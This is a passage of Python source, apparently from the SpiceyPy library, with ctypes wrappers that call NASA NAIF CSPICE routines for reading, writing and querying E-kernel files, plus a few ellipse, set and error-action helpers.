    nlflgs = stypes.toIntVector(nlflgs)  # bools marshaled as C ints
    rcptrs = stypes.toIntVector(rcptrs)
    # wkindx is converted to a C vector, written in place by CSPICE, and
    # returned as a Python sequence.
    wkindx = stypes.toIntVector(wkindx)
    libspice.ekaclc_c(handle, segno, column, vallen, cvals, entszs, nlflgs,
                      rcptrs, wkindx)
    return stypes.cVectorToPython(wkindx)
@spiceErrorCheck
def ekacld(handle, segno, column, dvals, entszs, nlflgs, rcptrs, wkindx):
    """
    Add an entire double precision column to an EK segment.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekacld_c.html
    :param handle: EK file handle.
    :type handle: int
    :param segno: Number of segment to add column to.
    :type segno: int
    :param column: Column name.
    :type column: str
    :param dvals: Double precision values to add to column.
    :type dvals: Array of floats
    :param entszs: Array of sizes of column entries.
    :type entszs: Array of ints
    :param nlflgs: Array of null flags for column entries.
    :type nlflgs: Array of bools
    :param rcptrs: Record pointers for segment.
    :type rcptrs: Array of ints
    :param wkindx: Work space for column index.
    :type wkindx: Array of ints
    :return: Work space for column index.
    :rtype: Array of ints
    """
    handle = ctypes.c_int(handle)
    segno = ctypes.c_int(segno)
    column = stypes.stringToCharP(column)
    dvals = stypes.toDoubleVector(dvals)
    entszs = stypes.toIntVector(entszs)
    nlflgs = stypes.toIntVector(nlflgs)  # bools marshaled as C ints
    rcptrs = stypes.toIntVector(rcptrs)
    # wkindx is converted to a C vector, written in place by CSPICE, and
    # returned as a Python sequence.
    wkindx = stypes.toIntVector(wkindx)
    libspice.ekacld_c(handle, segno, column, dvals, entszs, nlflgs, rcptrs,
                      wkindx)
    return stypes.cVectorToPython(wkindx)
@spiceErrorCheck
def ekacli(handle, segno, column, ivals, entszs, nlflgs, rcptrs, wkindx):
    """
    Add an entire integer column to an EK segment.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekacli_c.html
    :param handle: EK file handle.
    :type handle: int
    :param segno: Number of segment to add column to.
    :type segno: int
    :param column: Column name.
    :type column: str
    :param ivals: Integer values to add to column.
    :type ivals: Array of ints
    :param entszs: Array of sizes of column entries.
    :type entszs: Array of ints
    :param nlflgs: Array of null flags for column entries.
    :type nlflgs: Array of bools
    :param rcptrs: Record pointers for segment.
    :type rcptrs: Array of ints
    :param wkindx: Work space for column index.
    :type wkindx: Array of ints
    :return: Work space for column index.
    :rtype: Array of ints
    """
    handle = ctypes.c_int(handle)
    segno = ctypes.c_int(segno)
    column = stypes.stringToCharP(column)
    ivals = stypes.toIntVector(ivals)
    entszs = stypes.toIntVector(entszs)
    nlflgs = stypes.toIntVector(nlflgs)  # bools marshaled as C ints
    rcptrs = stypes.toIntVector(rcptrs)
    # wkindx is converted to a C vector, written in place by CSPICE, and
    # returned as a Python sequence.
    wkindx = stypes.toIntVector(wkindx)
    libspice.ekacli_c(handle, segno, column, ivals, entszs, nlflgs, rcptrs,
                      wkindx)
    return stypes.cVectorToPython(wkindx)
@spiceErrorCheck
def ekappr(handle, segno):
    """
    Append a new, empty record at the end of a specified E-kernel segment.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekappr_c.html
    :param handle: File handle.
    :type handle: int
    :param segno: Segment number.
    :type segno: int
    :return: Number of appended record.
    :rtype: int
    """
    recno = ctypes.c_int()
    libspice.ekappr_c(ctypes.c_int(handle), ctypes.c_int(segno),
                      ctypes.byref(recno))
    return recno.value
@spiceErrorCheck
def ekbseg(handle, tabnam, cnames, decls):
    """
    Start a new segment in an E-kernel.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekbseg_c.html
    :param handle: File handle.
    :type handle: int
    :param tabnam: Table name.
    :type tabnam: str
    :param cnames: Names of columns.
    :type cnames: list of str.
    :param decls: Declarations of columns.
    :type decls: list of str.
    :return: Segment number.
    :rtype: int
    """
    ncols = ctypes.c_int(len(cnames))
    # String-array widths must be the longest entry plus one (trailing NUL),
    # otherwise ekbseg_c fails (e.g. 'c1' needs a width of 3).
    cnmlen = ctypes.c_int(len(max(cnames, key=len)) + 1)
    declen = ctypes.c_int(len(max(decls, key=len)) + 1)
    cnamarr = stypes.listToCharArrayPtr(cnames)
    declarr = stypes.listToCharArrayPtr(decls)
    segno = ctypes.c_int()
    libspice.ekbseg_c(ctypes.c_int(handle), stypes.stringToCharP(tabnam),
                      ncols, cnmlen, cnamarr, declen, declarr,
                      ctypes.byref(segno))
    return segno.value
@spiceErrorCheck
def ekccnt(table):
    """
    Return the number of distinct columns in a specified,
    currently loaded table.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekccnt_c.html
    :param table: Name of table.
    :type table: str
    :return: Count of distinct, currently loaded columns.
    :rtype: int
    """
    ccount = ctypes.c_int()
    libspice.ekccnt_c(stypes.stringToCharP(table), ctypes.byref(ccount))
    return ccount.value
@spiceErrorCheck
def ekcii(table, cindex, lenout=_default_len_out):
    """
    Return attribute information about a column belonging to a loaded
    EK table, specifying the column by table and index.
    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekcii_c.html
    :param table: Name of table containing column.
    :type table: str
    :param cindex: Index of column whose attributes are to be found.
    :type cindex: int
    :param lenout: Maximum allowed length of column name.
    :return: Name of column, Column attribute descriptor.
    :rtype: tuple
    """
    # Output buffer for the column name plus the attribute descriptor struct.
    column = stypes.stringToCharP(lenout)
    attdsc = stypes.SpiceEKAttDsc()
    libspice.ekcii_c(stypes.stringToCharP(table), ctypes.c_int(cindex),
                     ctypes.c_int(lenout), column, ctypes.byref(attdsc))
    return stypes.toPythonString(column), attdsc
@spiceErrorCheck
def ekcls(handle):
    """
    Close an E-kernel.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekcls_c.html

    :param handle: EK file handle.
    :type handle: int
    """
    libspice.ekcls_c(ctypes.c_int(handle))
@spiceErrorCheck
def ekdelr(handle, segno, recno):
    """
    Delete a specified record from a specified E-kernel segment.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekdelr_c.html

    :param handle: File handle.
    :type handle: int
    :param segno: Segment number.
    :type segno: int
    :param recno: Record number.
    :type recno: int
    """
    libspice.ekdelr_c(ctypes.c_int(handle), ctypes.c_int(segno),
                      ctypes.c_int(recno))
@spiceErrorCheck
def ekffld(handle, segno, rcptrs):
    """
    Complete a fast write operation on a new E-kernel segment.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekffld_c.html

    :param handle: File handle.
    :type handle: int
    :param segno: Segment number.
    :type segno: int
    :param rcptrs: Record pointers.
    :type rcptrs: Array of ints
    """
    ptr_arr = stypes.toIntVector(rcptrs)
    # ekffld_c expects a plain int*, so cast the array object explicitly.
    libspice.ekffld_c(ctypes.c_int(handle), ctypes.c_int(segno),
                      ctypes.cast(ptr_arr, ctypes.POINTER(ctypes.c_int)))
@spiceErrorCheck
def ekfind(query, lenout=_default_len_out):
    """
    Find E-kernel data that satisfy a set of constraints.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekfind_c.html

    :param query: Query specifying data to be found.
    :type query: str
    :param lenout: Declared length of output error message string.
    :type lenout: int
    :return:
            Number of matching rows,
            Flag indicating whether query parsed correctly,
            Parse error description.
    :rtype: tuple
    """
    msglen = ctypes.c_int(lenout)
    nmrows = ctypes.c_int()
    error = ctypes.c_int()
    # Buffer that receives the parse-error description (if any).
    errmsg = stypes.stringToCharP(msglen)
    libspice.ekfind_c(stypes.stringToCharP(query), msglen,
                      ctypes.byref(nmrows), ctypes.byref(error), errmsg)
    return nmrows.value, error.value, stypes.toPythonString(errmsg)
@spiceErrorCheck
@spiceFoundExceptionThrower
def ekgc(selidx, row, element, lenout=_default_len_out):
    """
    Return an element of an entry in a column of character type in a specified
    row.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekgc_c.html

    :param selidx: Index of parent column in SELECT clause.
    :type selidx: int
    :param row: Row to fetch from.
    :type row: int
    :param element: Index of element, within column entry, to fetch.
    :type element: int
    :param lenout: Maximum length of column element.
    :type lenout: int
    :return:
            Character string element of column entry,
            Flag indicating whether column entry was null.
    :rtype: tuple
    """
    buflen = ctypes.c_int(lenout)
    null = ctypes.c_int()
    found = ctypes.c_int()
    cdata = stypes.stringToCharP(buflen)
    libspice.ekgc_c(ctypes.c_int(selidx), ctypes.c_int(row),
                    ctypes.c_int(element), buflen, cdata,
                    ctypes.byref(null), ctypes.byref(found))
    return stypes.toPythonString(cdata), null.value, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def ekgd(selidx, row, element):
    """
    Return an element of an entry in a column of double precision type in a
    specified row.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekgd_c.html

    :param selidx: Index of parent column in SELECT clause.
    :type selidx: int
    :param row: Row to fetch from.
    :type row: int
    :param element: Index of element, within column entry, to fetch.
    :type element: int
    :return:
            Double precision element of column entry,
            Flag indicating whether column entry was null.
    :rtype: tuple
    """
    ddata = ctypes.c_double()
    null = ctypes.c_int()
    found = ctypes.c_int()
    libspice.ekgd_c(ctypes.c_int(selidx), ctypes.c_int(row),
                    ctypes.c_int(element), ctypes.byref(ddata),
                    ctypes.byref(null), ctypes.byref(found))
    return ddata.value, null.value, bool(found.value)
@spiceErrorCheck
@spiceFoundExceptionThrower
def ekgi(selidx, row, element):
    """
    Return an element of an entry in a column of integer type in a specified
    row.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekgi_c.html

    :param selidx: Index of parent column in SELECT clause.
    :type selidx: int
    :param row: Row to fetch from.
    :type row: int
    :param element: Index of element, within column entry, to fetch.
    :type element: int
    :return:
            Integer element of column entry,
            Flag indicating whether column entry was null.
    :rtype: tuple
    """
    idata = ctypes.c_int()
    null = ctypes.c_int()
    found = ctypes.c_int()
    libspice.ekgi_c(ctypes.c_int(selidx), ctypes.c_int(row),
                    ctypes.c_int(element), ctypes.byref(idata),
                    ctypes.byref(null), ctypes.byref(found))
    return idata.value, null.value, bool(found.value)
@spiceErrorCheck
def ekifld(handle, tabnam, ncols, nrows, cnmlen, cnames, declen, decls):
    """
    Initialize a new E-kernel segment to allow fast writing.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekifld_c.html

    :param handle: File handle.
    :type handle: int
    :param tabnam: Table name.
    :type tabnam: str
    :param ncols: Number of columns in the segment.
    :type ncols: int
    :param nrows: Number of rows in the segment.
    :type nrows: int
    :param cnmlen: Length of names in in column name array.
    :type cnmlen: int
    :param cnames: Names of columns.
    :type cnames: list of str.
    :param declen: Length of declaration strings in declaration array.
    :type declen: int
    :param decls: Declarations of columns.
    :type decls: list of str.
    :return: Segment number, Array of record pointers.
    :rtype: tuple
    """
    handle = ctypes.c_int(handle)
    tabnam = stypes.stringToCharP(tabnam)
    ncols = ctypes.c_int(ncols)
    nrows = ctypes.c_int(nrows)
    cnmlen = ctypes.c_int(cnmlen)
    cnames = stypes.listToCharArray(cnames)
    declen = ctypes.c_int(declen)
    # Workspace that receives one record pointer per row; it is filled in by
    # ekifld_c and later passed to the ekacl* fast-write routines.
    recptrs = stypes.emptyIntVector(nrows)
    decls = stypes.listToCharArray(decls)
    segno = ctypes.c_int()
    libspice.ekifld_c(handle, tabnam, ncols, nrows, cnmlen, cnames, declen,
                      decls, ctypes.byref(segno), recptrs)
    return segno.value, stypes.cVectorToPython(recptrs)
@spiceErrorCheck
def ekinsr(handle, segno, recno):
    """
    Add a new, empty record to a specified E-kernel segment at a specified
    index.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekinsr_c.html

    :param handle: File handle.
    :type handle: int
    :param segno: Segment number.
    :type segno: int
    :param recno: Record number.
    :type recno: int
    """
    libspice.ekinsr_c(ctypes.c_int(handle), ctypes.c_int(segno),
                      ctypes.c_int(recno))
@spiceErrorCheck
def eklef(fname):
    """
    Load an EK file, making it accessible to the EK readers.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/eklef_c.html

    :param fname: Name of EK file to load.
    :type fname: str
    :return: File handle of loaded EK file.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.eklef_c(stypes.stringToCharP(fname), ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def eknelt(selidx, row):
    """
    Return the number of elements in a specified column entry in
    the current row.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/eknelt_c.html

    :param selidx: Index of parent column in SELECT clause.
    :type selidx: int
    :param row: Row containing element.
    :type row: int
    :return: The number of elements in entry in current row.
    :rtype: int
    """
    return libspice.eknelt_c(ctypes.c_int(selidx), ctypes.c_int(row))
@spiceErrorCheck
def eknseg(handle):
    """
    Return the number of segments in a specified EK.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/eknseg_c.html

    :param handle: EK file handle.
    :type handle: int
    :return: The number of segments in the specified E-kernel.
    :rtype: int
    """
    return libspice.eknseg_c(ctypes.c_int(handle))
@spiceErrorCheck
def ekntab():
    """
    Return the number of loaded EK tables.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekntab_c.html

    :return: The number of loaded EK tables.
    :rtype: int
    """
    count = ctypes.c_int(0)
    libspice.ekntab_c(ctypes.byref(count))
    return count.value
@spiceErrorCheck
def ekopn(fname, ifname, ncomch):
    """
    Open a new E-kernel file and prepare the file for writing.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekopn_c.html

    :param fname: Name of EK file.
    :type fname: str
    :param ifname: Internal file name.
    :type ifname: str
    :param ncomch: The number of characters to reserve for comments.
    :type ncomch: int
    :return: Handle attached to new EK file.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.ekopn_c(stypes.stringToCharP(fname),
                     stypes.stringToCharP(ifname),
                     ctypes.c_int(ncomch), ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def ekopr(fname):
    """
    Open an existing E-kernel file for reading.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekopr_c.html

    :param fname: Name of EK file.
    :type fname: str
    :return: Handle attached to EK file.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.ekopr_c(stypes.stringToCharP(fname), ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def ekops():
    """
    Open a scratch (temporary) E-kernel file and prepare the file
    for writing.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekops_c.html

    :return: Handle attached to new EK file.
    :rtype: int
    """
    # Output slot for the file handle; the scratch file itself is managed
    # entirely by CSPICE.
    handle = ctypes.c_int()
    libspice.ekops_c(ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def ekopw(fname):
    """
    Open an existing E-kernel file for writing.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekopw_c.html

    :param fname: Name of EK file.
    :type fname: str
    :return: Handle attached to EK file.
    :rtype: int
    """
    handle = ctypes.c_int()
    libspice.ekopw_c(stypes.stringToCharP(fname), ctypes.byref(handle))
    return handle.value
@spiceErrorCheck
def ekpsel(query, msglen, tablen, collen):
    """
    Parse the SELECT clause of an EK query, returning full particulars
    concerning each selected item.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekpsel_c.html
    note: oddly docs at url are incomplete/incorrect.

    :param query: EK query.
    :type query: str
    :param msglen: Available space in the output error message string.
    :type msglen: int
    :param tablen: Declared length of strings in the table-name output array.
    :type tablen: int
    :param collen: Declared length of strings in the column-name output array.
    :type collen: int
    :return:
            Number of items in SELECT clause of query,
            Begin positions of expressions in SELECT clause,
            End positions of expressions in SELECT clause,
            Data types of expressions,
            Classes of expressions,
            Names of tables qualifying SELECT columns,
            Names of columns in SELECT clause of query,
            Error flag,
            Parse error message.
    :rtype: tuple
    """
    query = stypes.stringToCharP(query)
    msglen = ctypes.c_int(msglen)
    tablen = ctypes.c_int(tablen)
    collen = ctypes.c_int(collen)
    n = ctypes.c_int()
    # Fixed-size workspaces sized for the CSPICE maximum number of SELECT
    # items; only the first n entries are meaningful after the call.
    xbegs = stypes.emptyIntVector(_SPICE_EK_MAXQSEL)
    xends = stypes.emptyIntVector(_SPICE_EK_MAXQSEL)
    xtypes = stypes.emptyIntVector(_SPICE_EK_MAXQSEL)
    xclass = stypes.emptyIntVector(_SPICE_EK_MAXQSEL)
    tabs = stypes.emptyCharArray(yLen=_SPICE_EK_MAXQSEL, xLen=tablen)
    cols = stypes.emptyCharArray(yLen=_SPICE_EK_MAXQSEL, xLen=collen)
    error = ctypes.c_int()
    errmsg = stypes.stringToCharP(msglen)
    libspice.ekpsel_c(query, msglen, tablen, collen, ctypes.byref(n),
                      xbegs, xends, xtypes, xclass, ctypes.byref(tabs),
                      ctypes.byref(cols), ctypes.byref(error), errmsg)
    # Truncate every workspace to the n entries actually populated.
    return (n.value,
            stypes.cVectorToPython(xbegs)[:n.value],
            stypes.cVectorToPython(xends)[:n.value],
            stypes.cVectorToPython(xtypes)[:n.value],
            stypes.cVectorToPython(xclass)[:n.value],
            stypes.cVectorToPython(tabs)[:n.value],
            stypes.cVectorToPython(cols)[:n.value],
            error.value,
            stypes.toPythonString(errmsg))
@spiceErrorCheck
def ekrcec(handle, segno, recno, column, lenout, nelts=_SPICE_EK_EKRCEX_ROOM_DEFAULT):
    """
    Read data from a character column in a specified EK record.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekrcec_c.html

    :param handle: Handle attached to EK file.
    :type handle: int
    :param segno: Index of segment containing record.
    :type segno: int
    :param recno: Record from which data is to be read.
    :type recno: int
    :param column: Column name.
    :type column: str
    :param lenout: Maximum length of output strings.
    :type lenout: int
    :param nelts: Number of elements to allow for (default=100)
    :type nelts: int
    :return:
            Number of values in column entry,
            Character values in column entry,
            Flag indicating whether column entry is null.
    :rtype: tuple
    """
    handle = ctypes.c_int(handle)
    segno = ctypes.c_int(segno)
    recno = ctypes.c_int(recno)
    column = stypes.stringToCharP(column)
    lenout = ctypes.c_int(lenout)
    nvals = ctypes.c_int()
    # Workspace for up to nelts strings of lenout characters each.
    cvals = stypes.emptyCharArray(yLen=nelts, xLen=lenout)
    isnull = ctypes.c_int()
    libspice.ekrcec_c(handle, segno, recno, column, lenout, ctypes.byref(nvals), ctypes.byref(cvals), ctypes.byref(isnull))
    # Unless a SPICE error was signalled, the returned count must fit in the
    # workspace we allocated (otherwise memory was already overrun).
    # NOTE(review): assert is stripped under `python -O`.
    assert failed() or (nvals.value <= nelts)
    return nvals.value, stypes.cVectorToPython(cvals)[:nvals.value], bool(isnull.value)
@spiceErrorCheck
def ekrced(handle, segno, recno, column, nelts=_SPICE_EK_EKRCEX_ROOM_DEFAULT):
    """
    Read data from a double precision column in a specified EK record.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekrced_c.html

    :param handle: Handle attached to EK file.
    :type handle: int
    :param segno: Index of segment containing record.
    :type segno: int
    :param recno: Record from which data is to be read.
    :type recno: int
    :param column: Column name.
    :type column: str
    :param nelts: Number of elements to allow for (default=100)
    :type nelts: int
    :return:
            Number of values in column entry,
            Float values in column entry,
            Flag indicating whether column entry is null.
    :rtype: tuple
    """
    handle = ctypes.c_int(handle)
    segno = ctypes.c_int(segno)
    recno = ctypes.c_int(recno)
    column = stypes.stringToCharP(column)
    nvals = ctypes.c_int(0)
    # Workspace sized for up to nelts doubles.
    dvals = stypes.emptyDoubleVector(nelts)
    isnull = ctypes.c_int()
    libspice.ekrced_c(handle, segno, recno, column, ctypes.byref(nvals), dvals,
                      ctypes.byref(isnull))
    # Unless a SPICE error was signalled, the returned count must fit in the
    # workspace. NOTE(review): assert is stripped under `python -O`.
    assert failed() or (nvals.value <= nelts)
    return nvals.value, stypes.cVectorToPython(dvals)[:nvals.value], bool(isnull.value)
@spiceErrorCheck
def ekrcei(handle, segno, recno, column, nelts=_SPICE_EK_EKRCEX_ROOM_DEFAULT):
    """
    Read data from an integer column in a specified EK record.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekrcei_c.html

    :param handle: Handle attached to EK file.
    :type handle: int
    :param segno: Index of segment containing record.
    :type segno: int
    :param recno: Record from which data is to be read.
    :type recno: int
    :param column: Column name.
    :type column: str
    :param nelts: Number of elements to allow for (default=100)
    :type nelts: int
    :return:
            Number of values in column entry,
            Integer values in column entry,
            Flag indicating whether column entry is null.
    :rtype: tuple
    """
    handle = ctypes.c_int(handle)
    segno = ctypes.c_int(segno)
    recno = ctypes.c_int(recno)
    column = stypes.stringToCharP(column)
    nvals = ctypes.c_int()
    # Workspace sized for up to nelts integers.
    ivals = stypes.emptyIntVector(nelts)
    isnull = ctypes.c_int()
    libspice.ekrcei_c(handle, segno, recno, column, ctypes.byref(nvals), ivals,
                      ctypes.byref(isnull))
    # Unless a SPICE error was signalled, the returned count must fit in the
    # workspace. NOTE(review): assert is stripped under `python -O`.
    assert failed() or (nvals.value <= nelts)
    return nvals.value, stypes.cVectorToPython(ivals)[:nvals.value], bool(isnull.value)
@spiceErrorCheck
def ekssum(handle, segno):
    """
    Return summary information for a specified segment in a specified EK.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekssum_c.html

    :param handle: Handle of EK.
    :type handle: int
    :param segno: Number of segment to be summarized.
    :type segno: int
    :return: EK segment summary.
    :rtype: spicepy.utils.support_types.SpiceEKSegSum
    """
    summary = stypes.SpiceEKSegSum()
    libspice.ekssum_c(ctypes.c_int(handle), ctypes.c_int(segno),
                      ctypes.byref(summary))
    return summary
@spiceErrorCheck
def ektnam(n, lenout=_default_len_out):
    """
    Return the name of a specified, loaded table.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ektnam_c.html

    :param n: Index of table.
    :type n: int
    :param lenout: Maximum table name length.
    :type lenout: int
    :return: Name of table.
    :rtype: str
    """
    maxlen = ctypes.c_int(lenout)
    table = stypes.stringToCharP(maxlen)
    libspice.ektnam_c(ctypes.c_int(n), maxlen, table)
    return stypes.toPythonString(table)
@spiceErrorCheck
def ekucec(handle, segno, recno, column, nvals, cvals, isnull):
    """
    Update a character column entry in a specified EK record.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekucec_c.html

    :param handle: EK file handle.
    :type handle: int
    :param segno: Index of segment containing record.
    :type segno: int
    :param recno: Record to which data is to be updated.
    :type recno: int
    :param column: Column name.
    :type column: str
    :param nvals: Number of values in new column entry.
    :type nvals: int
    :param cvals: Character values comprising new column entry.
    :type cvals: list of str.
    :param isnull: Flag indicating whether column entry is null.
    :type isnull: bool
    """
    # Entry width must include the terminating NUL, hence the +1.
    vallen = ctypes.c_int(max(len(s) for s in cvals) + 1)
    libspice.ekucec_c(ctypes.c_int(handle), ctypes.c_int(segno),
                      ctypes.c_int(recno), stypes.stringToCharP(column),
                      ctypes.c_int(nvals), vallen,
                      stypes.listToCharArrayPtr(cvals, xLen=vallen),
                      ctypes.c_int(isnull))
@spiceErrorCheck
def ekuced(handle, segno, recno, column, nvals, dvals, isnull):
    """
    Update a double precision column entry in a specified EK record.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekuced_c.html

    :param handle: EK file handle.
    :type handle: int
    :param segno: Index of segment containing record.
    :type segno: int
    :param recno: Record to which data is to be updated.
    :type recno: int
    :param column: Column name.
    :type column: str
    :param nvals: Number of values in new column entry.
    :type nvals: int
    :param dvals: Double precision values comprising new column entry.
    :type dvals: Array of floats
    :param isnull: Flag indicating whether column entry is null.
    :type isnull: bool
    """
    handle = ctypes.c_int(handle)
    segno = ctypes.c_int(segno)
    recno = ctypes.c_int(recno)
    column = stypes.stringToCharP(column)
    nvals = ctypes.c_int(nvals)
    dvals = stypes.toDoubleVector(dvals)
    isnull = ctypes.c_int(isnull)
    # Bug fix: this wrapper previously called ekaced_c (append to a
    # fast-write segment), not ekuced_c (update an existing entry) as
    # its name and docstring promise.
    libspice.ekuced_c(handle, segno, recno, column, nvals, dvals, isnull)
@spiceErrorCheck
def ekucei(handle, segno, recno, column, nvals, ivals, isnull):
    """
    Update an integer column entry in a specified EK record.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekucei_c.html

    :param handle: EK file handle.
    :type handle: int
    :param segno: Index of segment containing record.
    :type segno: int
    :param recno: Record to which data is to be updated.
    :type recno: int
    :param column: Column name.
    :type column: str
    :param nvals: Number of values in new column entry.
    :type nvals: int
    :param ivals: Integer values comprising new column entry.
    :type ivals: Array of ints
    :param isnull: Flag indicating whether column entry is null.
    :type isnull: bool
    """
    libspice.ekucei_c(ctypes.c_int(handle), ctypes.c_int(segno),
                      ctypes.c_int(recno), stypes.stringToCharP(column),
                      ctypes.c_int(nvals), stypes.toIntVector(ivals),
                      ctypes.c_int(isnull))
@spiceErrorCheck
def ekuef(handle):
    """
    Unload an EK file, making its contents inaccessible to the
    EK reader routines, and clearing space in order to allow other
    EK files to be loaded.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ekuef_c.html

    :param handle: Handle of EK file.
    :type handle: int
    """
    libspice.ekuef_c(ctypes.c_int(handle))
@spiceErrorCheck
def el2cgv(ellipse):
    """
    Convert an ellipse to a center vector and two generating
    vectors. The selected generating vectors are semi-axes of the
    ellipse.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/el2cgv_c.html

    :param ellipse: An Ellipse
    :type ellipse: spiceypy.utils.support_types.Ellipse
    :return: Center and semi-axes of ellipse.
    :rtype: tuple
    """
    assert (isinstance(ellipse, stypes.Ellipse))
    # Three 3-vector output buffers: center, semi-major and semi-minor axes.
    center, smajor, sminor = (stypes.emptyDoubleVector(3) for _ in range(3))
    libspice.el2cgv_c(ctypes.byref(ellipse), center, smajor, sminor)
    return (stypes.cVectorToPython(center),
            stypes.cVectorToPython(smajor),
            stypes.cVectorToPython(sminor))
@spiceErrorCheck
def elemc(item, inset):
    """
    Determine whether an item is an element of a character set.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/elemc_c.html

    :param item: Item to be tested.
    :type item: str
    :param inset: Set to be tested.
    :type inset: spiceypy.utils.support_types.SpiceCell
    :return: True if item is an element of set.
    :rtype: bool
    """
    assert isinstance(inset, stypes.SpiceCell)
    return bool(libspice.elemc_c(stypes.stringToCharP(item),
                                 ctypes.byref(inset)))
@spiceErrorCheck
def elemd(item, inset):
    """
    Determine whether an item is an element of a double precision set.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/elemd_c.html

    :param item: Item to be tested.
    :type item: float
    :param inset: Set to be tested.
    :type inset: spiceypy.utils.support_types.SpiceCell
    :return: True if item is an element of set.
    :rtype: bool
    """
    assert isinstance(inset, stypes.SpiceCell)
    # dtype 1 marks a double-precision SpiceCell.
    assert inset.dtype == 1
    return bool(libspice.elemd_c(ctypes.c_double(item), ctypes.byref(inset)))
@spiceErrorCheck
def elemi(item, inset):
    """
    Determine whether an item is an element of an integer set.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/elemi_c.html

    :param item: Item to be tested.
    :type item: int
    :param inset: Set to be tested.
    :type inset: spiceypy.utils.support_types.SpiceCell
    :return: True if item is an element of set.
    :rtype: bool
    """
    assert isinstance(inset, stypes.SpiceCell)
    # dtype 2 marks an integer SpiceCell.
    assert inset.dtype == 2
    return bool(libspice.elemi_c(ctypes.c_int(item), ctypes.byref(inset)))
@spiceErrorCheck
def eqncpv(et, epoch, eqel, rapol, decpol):
    """
    Compute the state (position and velocity of an object whose
    trajectory is described via equinoctial elements relative to some
    fixed plane (usually the equatorial plane of some planet).

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/eqncpv_c.html

    :param et: Epoch in seconds past J2000 to find state.
    :type et: float
    :param epoch: Epoch of elements in seconds past J2000.
    :type epoch: float
    :param eqel: Array of equinoctial elements
    :type eqel: 9-Element Array of floats
    :param rapol: Right Ascension of the pole of the reference plane.
    :type rapol: float
    :param decpol: Declination of the pole of the reference plane.
    :type decpol: float
    :return: State of the object described by eqel.
    :rtype: 6-Element Array of floats
    """
    # 6-element output buffer: position followed by velocity.
    state = stypes.emptyDoubleVector(6)
    libspice.eqncpv_c(ctypes.c_double(et), ctypes.c_double(epoch),
                      stypes.toDoubleVector(eqel), ctypes.c_double(rapol),
                      ctypes.c_double(decpol), state)
    return stypes.cVectorToPython(state)
@spiceErrorCheck
def eqstr(a, b):
    """
    Determine whether two strings are equivalent.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/eqstr_c.html

    :param a: Arbitrary character string.
    :type a: str
    :param b: Arbitrary character string.
    :type b: str
    :return: True if A and B are equivalent.
    :rtype: bool
    """
    first = stypes.stringToCharP(a)
    second = stypes.stringToCharP(b)
    return bool(libspice.eqstr_c(first, second))
def erract(op, lenout, action=None):
    """
    Retrieve or set the default error action.
    spiceypy sets the default error action to "report" on init.

    http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/erract_c.html

    :param op: Operation, "GET" or "SET".
    :type op: str
    :param lenout: Length of list for output.
    :type lenout: int
    :param action: Error response action.
    :type action: str
    :return: Error response action.
    :rtype: str
    """
    # "GET" needs no input action, so allow callers to omit it.
    if action is None:
        action = ""
    lenout = ctypes.c_int(lenout)
    op = stypes.stringToCharP(op)
    # The action buffer is both input ("SET") and output ("GET"): build a
    # mutable buffer of lenout bytes and hand the C routine a char* into it.
    action = ctypes.create_string_buffer(str.encode(action), lenout.value)
    actionptr = ctypes.c_char_p(ctypes.addressof(action))
    libspice.erract_c(op, lenout, actionptr)
